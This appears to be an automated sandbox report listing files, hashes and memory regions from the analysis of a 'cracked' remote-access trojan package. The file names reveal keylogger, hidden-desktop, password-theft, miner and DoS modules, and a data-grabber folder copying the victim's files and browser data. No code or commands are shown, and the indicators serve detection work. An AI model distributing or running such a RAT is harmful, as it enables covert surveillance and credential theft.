C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | 8d1e09604f03d722a6203a50d13c476a |
| SHA1 | b5c43ff15b9a01346907e2c96936c1b855719b0e |
| SHA256 | 283504cf75629ea4958b2b3e34d1f4e072090d907ce2b829e0fafd4b7598d357 |
| SHA512 | 6d0eec952abed603a769830d8cef19fff751a207b411a905824585f219aa6f541ff1c84dfd423f7405ee4efdb92ac75e0e78667cb43e245cc48ad9185cb4f26e |
memory/2192-1283-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1285-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2028-1286-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1289-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp
memory/2028-1292-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1293-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2028-1291-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1294-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1290-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/2192-1295-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/2028-1296-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1297-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1298-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1299-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/1360-1300-0x0000000074680000-0x0000000074D6E000-memory.dmp
memory/2028-1301-0x0000000000C60000-0x0000000000C92000-memory.dmp
memory/2192-1302-0x0000000001280000-0x00000000012B2000-memory.dmp
memory/2028-1303-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2580-1304-0x0000000000400000-0x0000000000439000-memory.dmp
memory/2192-1305-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/1360-1306-0x0000000002020000-0x0000000002060000-memory.dmp
memory/2192-1307-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1308-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1309-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1310-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2192-1311-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1312-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1313-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/2028-1314-0x000000001C350000-0x000000001C3D0000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll
| MD5 | 3aaae3cec15b86693ae9fb8e1507c872 |
| SHA1 | ed8d0a139c609eb886482718ec2ecf96cbbe8c84 |
| SHA256 | a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b |
| SHA512 | 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463 |
memory/2192-1316-0x000000001BD70000-0x000000001BD7C000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12
| MD5 | c60e527a85f285ddc66c2fcf160b1be7 |
| SHA1 | abcf2b6bffea9f0f30190783f6eae2434ef7a9a8 |
| SHA256 | 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f |
| SHA512 | 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e |
memory/2192-1319-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1321-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1324-0x0000000031C80000-0x0000000031CBC000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll
| MD5 | 17cbdd9e4cb0ede2fad8c08c05fdaa84 |
| SHA1 | 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c |
| SHA256 | d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441 |
| SHA512 | 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a |
memory/2192-1322-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1326-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1325-0x000000001BD90000-0x000000001BE10000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
| MD5 | d5b77dfb5f248f3aabc560d8300088c5 |
| SHA1 | bbf7bb5f78051a59e725920cea3d54d1e7473cea |
| SHA256 | 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55 |
| SHA512 | 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552 |
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm
| MD5 | feb8d2de1663adc1e141b8f7bb95d6ac |
| SHA1 | a9b1c4d0f522515c940a80876876d782510cb421 |
| SHA256 | ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b |
| SHA512 | af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm
| MD5 | e6fad395145548f21929c4050a70d710 |
| SHA1 | 97a8780b8a3d25185f83f88c5f320384b4069601 |
| SHA256 | c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92 |
| SHA512 | 857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm
| MD5 | 1efa2056cd994a29fd0d2e983ef7b26e |
| SHA1 | 76967624574c43b1e22e9b3ec4ba17139b547633 |
| SHA256 | 1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d |
| SHA512 | edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm
| MD5 | 78f905ea7378410c450c79ceb3b9012b |
| SHA1 | 495f677fd305c78a77e8164f7de7d732e1aca35c |
| SHA256 | 50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a |
| SHA512 | ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm
| MD5 | be38b0526e6d40f44c7b62d8db2c9553 |
| SHA1 | 5c4c70ae1381b5e51a685f96700340832229c06d |
| SHA256 | f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f |
| SHA512 | 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm
| MD5 | e03eaf459f028cc6fa8669e277c1a17a |
| SHA1 | ea0a775e49e279208962a9179c974969a2cf7e5e |
| SHA256 | a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f |
| SHA512 | 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm
| MD5 | a54153cd522d951f6b360c3bd3de84d0 |
| SHA1 | 639dbc414f495044c2d705f39ac965212f1c8c30 |
| SHA256 | 195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa |
| SHA512 | 95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt
| MD5 | f7bbcdd86cbc1d6d0b81720ac1477fde |
| SHA1 | 4799c37f86be4dda105ed3468934f70c36339474 |
| SHA256 | 50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f |
| SHA512 | 2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt
| MD5 | 963be96779d4ef26360c2a3af3a53816 |
| SHA1 | 6991959998c9939e5ededa0d6759a715559c2140 |
| SHA256 | f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4 |
| SHA512 | 4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0 |
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt
| MD5 | e9f329a48dcb70c6ad95c8ab8fe82eb0 |
| SHA1 | 45e25355e67fd2d528467b4117884ffb601552a3 |
| SHA256 | 5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637 |
| SHA512 | 62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4 |
C:\Users\Admin\Desktop\S500 RAT Source Code\readme.txt
| MD5 | 5983ea5e477d9bbd7751a1903e017762 |
| SHA1 | e472313990708995c479b50e8ff10c9e1140086d |
| SHA256 | ac9c17fb596e6ee68245d12ac63b9393c9c511fb3afe71448d5e5749cacca1ae |
| SHA512 | 5220c7d82a2c1e146ba22c00eb778e97fc19c34efb01a1412b4c7b52731dffb33cb0d5d11a2424d0152a6b61b50521a7dd6c320aa6792c791b88b9ba9a6c16a1 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Program.cs
| MD5 | d6b005305acfbe4587508dc3877294a9 |
| SHA1 | 38d568415346ff78acf79f0d518e7a8e9f6be959 |
| SHA256 | adfd734db6c4735f58bdbd5a5c4903f6a88de7b921c8d3c5a2da7e03bce29f3a |
| SHA512 | e7b52e740c572c8dcd9f4a94340dbdf85eed8bc85fd913345aa6835996b574dc7e5b489a4dbcc2fdc74db4a4a782836cac19943a9999747969a9ef9f252db330 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\App.cs
| MD5 | 53a1bc7f4a72237331ecb9aa01da8bd0 |
| SHA1 | 5b6c10f01e7379ff063df6fc9dfd64ce48155527 |
| SHA256 | 3b41c5acf029271942597465183c1cafbd1652775d4abb4ee249eb7e4823d3fa |
| SHA512 | 5ba23177fc0e4e239dee02ed4974dc22c3def9e4168bee0a0e3361e19a44529ead5ea4b9c82c1e0a321e5c3b959ec371d035b59e82c28fb2f2820ea966a12d01 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\ApplicationSettings.cs
| MD5 | bf517b0b3a45c9a9451e3656b20a9f52 |
| SHA1 | 51faa109422107d1573941da825203b3f92c362c |
| SHA256 | 5fb10237128d258baa75e30b8b9b48a29c369ab663f238b8539233da74816c5d |
| SHA512 | 45bdea0cb0eca0c6d225df6f04afcbd9938907d0c608d27bdfab41697b03c67c078d86a4185297d95fdc9f0b5bfaf60e9b0d6c4e580c48ea33d10b8094979456 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Constants.cs
| MD5 | 27a443d8293a5dbdcd20d66a5276f3d5 |
| SHA1 | d25303340a9a7641d8b1a94ac3e1754d28c0493d |
| SHA256 | 540d854b4e00858cd71a3744661b5040e81b9b230bd0ddc8ab4e8ddef96061d8 |
| SHA512 | a8ca338d9dd62a42f6d6055085cd5761e648f9cb579cda1268c88258800c87f7c05e5a936959c6b6ad8d5f6513b867fb50f3177de9eafc242f0ca06a94a23ed0 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Encryption.cs
| MD5 | 62c65acccd046b1e89a14a281c6838cb |
| SHA1 | f678a5a11db9de94e2bc3851dcdb5f2f66e79fb5 |
| SHA256 | 027631c1264c3aba3249e584d60f754527642b8df7fe0ffd41624e2a9631d7f6 |
| SHA512 | b5ca7cd5a5540201cbebc7bcf3c047bf2252f8c592df6475eb27dd6272a8566ede02dee299894a91466c56311b8432cc936a05a77bba3730dfbd905848932341 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\InfoManager.cs
| MD5 | 7788eff3b5d130358db1a9d5b5d94a86 |
| SHA1 | 156ec3c54a43031250f7281509870acad29c3e4f |
| SHA256 | f918c37ff46c7fa8139d6e1a721e10fda36ee80074388b356ec9f0aae090678f |
| SHA512 | 602211b0e1431a53b897188d045bbc9753238b47f8bdc52c0311391c3311cd7ad84b72be0ca6cd2086e3452f47b3cf832574bd048f3459ff6c7b929d2223aba2 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\User.cs
| MD5 | 590245612bc4e68a666b907a436d7e55 |
| SHA1 | 9c6e20ad5b6c43ebccb86db9251db4a68a2d766e |
| SHA256 | 9b0feb06f9af76fb63fd3231c5b00cb2fc6575bc64f82f9a3d477b43092a7a09 |
| SHA512 | f902edd07ca5b22e6626e9c670ac49436a4d938e4123b9762ed1ab35dea0f563e54dd79328c93cf61dbc554f85adde0a8bafbae14da71ee6432caefa6a3dabf0 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\BuildInfo.cs
| MD5 | a47f0eb84d4a844f6701449df7b49a5b |
| SHA1 | 26324a1ca64a5d20752018e95251cb3d071ade86 |
| SHA256 | dbc8c5d2d4a19ffda08dfa1ebec268ccd78b378ddf7a09d5f7d668d2010ec3be |
| SHA512 | 77dce702ee16c5d43901262ddea35c741c549c211471ac784e499a16839da68d59f74398b35ab1e28c6a8e888b0efc2a141f3c87e3659338709b7501ccc82c80 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\Utils.cs
| MD5 | b2e8e581082f57271651e8d9fe19a40b |
| SHA1 | 6d8af5b3b558f2d829b0da5ace4d4c67876cd290 |
| SHA256 | 331995f462b4d970a7c4f0556e53c7600973f40c8bcea6d8a72c5b40fc4f1598 |
| SHA512 | b550b382ec244cf4f52e8b4b156148aea06f6784ae9bfd7923ea7992a2e15604588efbfd732074c439da7d54d5b1a6838ae5aa0b4a17f432efc7fa523850d082 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FormAbout.cs
| MD5 | a17915e3f1f17ba1ceba3d59ffe503f1 |
| SHA1 | 5a0654c3c64613406a36dc0ac86889ca9e8422c3 |
| SHA256 | d4da167b054ca0bc40f2c060d3bbe5d4b43f90d1d41b722f1ea14273f7332f46 |
| SHA512 | 2b654e65214da976254b9400bfeda93365cb0681185b14b101dbb1e2f0ea87e20bc1790ef9c861128f2f3e6bbbe6036b330cb25eb17834c74cafa30204b16fa4 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmRec.cs
| MD5 | 1d772d1ef6b3ba72be0d41fb569e25ac |
| SHA1 | 196c0531b1122ed575af3d1deaa9498a9f01ed1f |
| SHA256 | 1fa6f6a85eccb1b84a1206cade3e9c1fbd152d3feb167abb009dd0df741e320a |
| SHA512 | dae5e1524d70592b1b025d964d4df918ab6a47650d0cfb4ccf21e3cf84982945e889077be613b67ed33a58985f56b410b3b94bbdd9dc5021b15455a0761789b5 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleChat.cs
| MD5 | fad096cd4f2dbb2e05c2994b5812cb13 |
| SHA1 | aa016fe79d20771b735af6e816b8675d9f319819 |
| SHA256 | 6ad8b6df50461c9587fcc97472b91cfaa28dba53fb0aaf15cda7140161ef3c9a |
| SHA512 | 9d4a4635de312d676ed4705bc17f76a91503339fa75908632fe8a31717c4f21007c25291f6b254c1e9a9eb85c8be70ec34932d115eb611f04c74fbf5354d8bb8 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFileSearcher.cs
| MD5 | 483622c17b2f1c7bcac04a8574aae2fe |
| SHA1 | 6896f388bb201d161c485fb20732d4f84c663d7e |
| SHA256 | f3f27c05bd7829d6883423ce7cba0e9719fb2ff0b661b5f64059eafb73611214 |
| SHA512 | bfc48dae2b88cd18051048c893c90a56626b317b834c8829bbcdbdc09d4ecea970102022d1c860b1bc447203f4a9798616157e290f8d1f0f97b8a0759a9a991d |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleDos.cs
| MD5 | 85b26983126bc8f4255f154f1b43026d |
| SHA1 | 289705d88a9d80b31614df3c6a1ed63a8e6e093f |
| SHA256 | ba959832e1815982aac245a02dc7189131ae297d3e71f0b79b401e4b9f83d07c |
| SHA512 | ffadd2c1de91f97dedcfb2da2cfba396352f84b47d31c735ef923f159452bc07a18bc49a22bf182b1d5f4849d4799a49a3ba2aa1325836f65a6b759150cc1b16 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleAudio.cs
| MD5 | e46826f22037990cdcbf2adf56a63ae1 |
| SHA1 | 806530956a20e6bb5cdb8321b2e8e9d762ffe158 |
| SHA256 | c14254a319d4575c45f2a3331f030629aafa990c8b1a6b28ece3cd326ac7b68f |
| SHA512 | 33df5e3cf704669ab97e78327ce4db6c6929e40e4f4b586a2f876e9d6c554a46751f7997561c518b0b53ec2361e1bcecfaef5389e71a28e31237a30fb37aeec3 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmTransfer.cs
| MD5 | 9250ace37a98aa75bbf0e7df7eadc6b4 |
| SHA1 | a9777df578a77416b04e95d36307e6e05b40e5ae |
| SHA256 | a4b88b97dbd6d32dbbb925ed4bbbac815e720a339f183cbeb812a3cb85a229c7 |
| SHA512 | 4ea1cc0d93a068ef6acd18cb43fcee156e44cede08eb89e23da1fbd18af55c81ccb1a1431d6b241aac85954f20e39a55710b8ee776e2f2d343327a791b1c83de |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFun.cs
| MD5 | ecfa94e4d1626b2d7b5fab42ba6eecff |
| SHA1 | b55b9d388c14dd5b7ccd51a1a6a5d969bdfee90f |
| SHA256 | 735f6018d61e7f65cf81b828e751bed543ffa76b187b57f3fdf8eb5e5d22d026 |
| SHA512 | 1870531cdf538cc6e4fbbe604cabdf00e8483f70b4e8da80717fb546eccb40415f735e85d7fd50ad658d80e247fa33b174072d2182bad983491ffa874f275606 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleHVNC.cs
| MD5 | 4a1d06f0d9fac5fb70a0322773a51f77 |
| SHA1 | 50e696781672593f8a3ab3149bc7b086a2cee31e |
| SHA256 | 9f2b07af21c52b1880a540294b12bfcf3a60744b0f139f8bfd6c7afbb2d0621c |
| SHA512 | 689ba12a4fd4c0cae9e85b31a2f0eeeadfe9f756f932f289e3fc4020b54525b165dcbc9fe11dab681c36612f60b93756bd3edf69fb174c8910f324f65f591512 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleKeylogger.cs
| MD5 | 66867585b21dad280d820d04def0edb6 |
| SHA1 | cb77bd7066df43851fa0c633b24a53ef3c079d87 |
| SHA256 | 802cf017ce9b4c065dd3cd9ba8e279127b4ba935bac1037541702e3c73dbf2b7 |
| SHA512 | e4c7d900738cea14ea01e31da594ff0e8bcf8487bf4387cfb8f78b00aff9aaeda51177cf060bcf259375810e097553a486192b618012e1272b3178206bcb98c8 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleInformation.cs
| MD5 | 993b8d7378d2249fbb6ce0d1fbd0caf2 |
| SHA1 | 48eba498f0b64cc1d9235389d68c671a818b2a27 |
| SHA256 | 460dbf36998b8d267b2b4f748428c3a06a027ce788cb28d73b64f82ece7e6a03 |
| SHA512 | aa94aa46b70cde920642e4e3294a3cb99825dd96c06855d76811ca81f805907a92abdcc89e5e1aa35fe4c8c598c63d7c8611a14894b7d6997ad60c53a5bcb8e5 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleProcessManager.cs
| MD5 | 6d2985668bda0e793da1c636775808ee |
| SHA1 | f54bf51f11a3b453592837d2e72790e2d0a285a6 |
| SHA256 | cde2ba5e1be41a86eaf359ff6d585677d722f1a7e92d962458f242f2f4517f75 |
| SHA512 | 7950c3c2e959ed91cd1cf5384eb78d7ef709a900a39e74be9482d17ed87f21f922f00d456999f2d344354f4932a9a34e96b3c08a0537b9e3265d0f2c1ab91843 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlerFileSearcher.cs
| MD5 | ebb5485590b79bdbf8ae79a63f83e6da |
| SHA1 | 021d5f7d2fe64073446efca70c9da3b47c37c59c |
| SHA256 | edb4185f0bdca89cbf2cebc72135e93a11913d99a3d167fef0bd84da57c3bd8c |
| SHA512 | 703729773fd015164d3792a0b726c3f227647dbe589c6105d0907de88d71ad93b4aad96c7b2d53716c9cf440b639fa0c51f1a91c3b88771edf658e05bc52c0a1 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleShell.cs
| MD5 | 02dfab19fe896b474e111c5438e1698c |
| SHA1 | 4fa009ab41770c7d5b2305a4a07e07167b375f0d |
| SHA256 | c8de8a4f8c8a5df94bc6a485a7440bc21966957f60fb301918af02408b5488cd |
| SHA512 | e92583725f85805471b3b55b6a9f6fa8bd31249780b9bd951ffe9b59cc5d2e35f362dac750db41181ab41f01c1b32a6666e9185fc5cf57001c129a2c7987644d |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleReportWindow.cs
| MD5 | 9764d1ac50cdb0b7212614208967d63f |
| SHA1 | 7f9ca9707db0d016ee3f285b4e2f7ee05228a8a0 |
| SHA256 | 2bb340f96986529f5c23cdbc51bfe04ded6a81f33c6c6e6d8df0b480b117898e |
| SHA512 | abf6e26e0fabe614084f386afeccf2e1c73d6c7ca7702471a45592730f88028dd223cb4981b7ae5e6d91125999a258b421d8ef35549354f5ddc96bb510cfa127 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleThumbnails.cs
| MD5 | 04c8276b921996b82ea3e4dcb46a6903 |
| SHA1 | fb3852b13f015051838aa5442e6b7ef412dc0bf0 |
| SHA256 | f804baaac0fa4c7706b83f70a877f8b8998bac11ca1cf35f01ed62d3bcb3751c |
| SHA512 | 8317e7b79d90762607af931af202c7dd70223adb723c03573f4ea67c06236ed4f148d7b1a07e8ad1df5cb5bf7dba4f8a3bb1d7104032f652b5b7ab65b88c7ab0 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRemoteDesktop.cs
| MD5 | 8dee4aae3ab14cb9c2edcd638c74bbd8 |
| SHA1 | 11eb87079623c7f98513487dff071be2c4c13cd0 |
| SHA256 | 01b1270f336c44160a2137d0c8bac252abb21d69280592a964202a6853a87813 |
| SHA512 | 78080cbb205695493c94c42c06bb875827420fee3a8f1d1090082fa293ec1d4fa9ce85cd82bdd401c6d54229f37ec615804c2ac5f52eea1668d8fd412931eb90 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRecovery.cs
| MD5 | e93d4932ba858f6a61f67c9a62bd72e3 |
| SHA1 | a84a131f2fca55c987a6f10a8530431902227391 |
| SHA256 | db63133ff98e2a34a82bbe6a6cb797f83379be1b0cb8546b8332ba8accd32e08 |
| SHA512 | a3635926cb344f6bfbfc1837acd252f362c4a3712cae556b5f5248a64f7d706e6ace0de71baa425f801f42ec4959c41a5ebfacb697bbc2b4e4308b28c2a3d23c |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlePassword.cs
| MD5 | 25d0a72cfb2520e7e92347c8016d1fed |
| SHA1 | c50a25e97f9e4ffa1f3a357866b751c2ec1aa0a5 |
| SHA256 | 2f60396bd4fd1235f701600dde55c355114fe4d6ad3b59a9a26615feb9b824f8 |
| SHA512 | 630f804e83c3b8a9b826790e5327344e1a5881abf5a31440f87aaa3a95616e5ada3ee4ef6997cb80881b57e2e8450bdea236871d0a1ad31d28bc7f8d36028900 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleNetstat.cs
| MD5 | 8f8786d6be266aab63c51a361cb1890c |
| SHA1 | b8630833c93c17fc6a6f62e1bced0da122ed1fbd |
| SHA256 | 3c4b983c453466ddca8f3a6a909680b5c4b4505b1a6e40e9c1b7fd2e82a62101 |
| SHA512 | d40b4bb708765065ab0a35a86e13574723e473f020804e30eea90cc00fd5676ff0c797d3aff61d94f2b158c660dbba0346590ab01d3c6173d4518b489083cbe7 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleMiner.cs
| MD5 | 060dc8b25c808fef52c6aae610d22bc8 |
| SHA1 | 484ebd1f52152840b4f0945838b90ade3984d3f2 |
| SHA256 | 5d45c4ea68475e71fb1ac0c0c160d25aa887cbf355eac265ce36f742881aafa5 |
| SHA512 | 06d25becfcce01b37aef3dcd4a9000f08a62bef2b65ab9aa6636196933caadd818521ed30417ed9d2f092abbeae073d5acd129837e70e78817c7b1fc0a26734f |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleLogs.cs
| MD5 | d85ffc7dc4a70e49867cb4506c892eb0 |
| SHA1 | ee660a91ef1c697952145740181e88e51c51f564 |
| SHA256 | df6baead08beeeae2101989ca93dd0dfb1eec6d5b1ea76386e44f275faa75a59 |
| SHA512 | e1b7fcfd74eeb4259fa1f449b93debe74ce38c8970bdcfc5ccb0de82e3d532b11e861bb59482d6872f9dfbcf427b8d16e441d23e3e13301e8f3d9790434e80a5 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\Compiler.cs
| MD5 | 9a053c7a21cf1dee3cecc32e7ee9b551 |
| SHA1 | c42383a966016cd83f58837a811425a16dd01df3 |
| SHA256 | 9e916b8c881168e511aaaea904660879b8b77c20a0552ff9208edd22c1a86253 |
| SHA512 | cc558e54ca3cf08371aef075afde570c8cd0b9dd1af24e5dfc0a28af33a9c0d90f440a24f803bcce337fc2e444a3f92221293a7abdca1b6306fe7eaaf3a53900 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\ListViewColumnSorter.cs
| MD5 | bae01e7821ec5afd7ff51fbe94baf083 |
| SHA1 | 72d7846e5ef290231a45b6b51ef61fb27ce4fcf2 |
| SHA256 | 8e5186d60147f8a722fcf28b7e1b91b00d082d32401c189eae2c93343bc2e554 |
| SHA512 | bca3bd26f5bf05bdbe6e4714e10bff31af8be89f7240e7835d2c3c4f4381134ad13f17aa0eb7c20f1cc47c48c9de47ae47f36d7ba1010a7bd1406ed9ae27b86c |
C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\FileInfo.cs
| MD5 | 2f9d9b634b11fb6f2c5b6b1842d1006f |
| SHA1 | d3d66d515ffe1c18fa4af2017df62712f5ffc03b |
| SHA256 | 9ad63e3ba242bd5aa970c8255227a7eac600d6f46110b64f51685c98b138010a |
| SHA512 | 3f6598f5b9b335f61785d5e18f484c223a516a36167d161f94068fcc4df03b7ae56f20c5e8a543f940ed97019564a84426197836ec15a20910262c5f8c6b6de5 |
C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\S500 RAT Source Code\Resources\tomem.png
| MD5 | 4aa22d0e14ae3ab96820b5fe3b29c24b |
| SHA1 | 92474fa98104670a4d73753b0ce0c3243b0fc751 |
| SHA256 | 09dad12ed97724088278d93d71e703a617ea062f5dfecd464f91130bc056b5ec |
| SHA512 | 90c8295d577eb573b23f6b809f18f2a22fb8bb6a49ad2c2c2c4ad87a3ce922ee263f5a0bc000b119fe61b4cb49e86bdb8ea01a94ed9647329cc14fadc5c86d7c |
C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
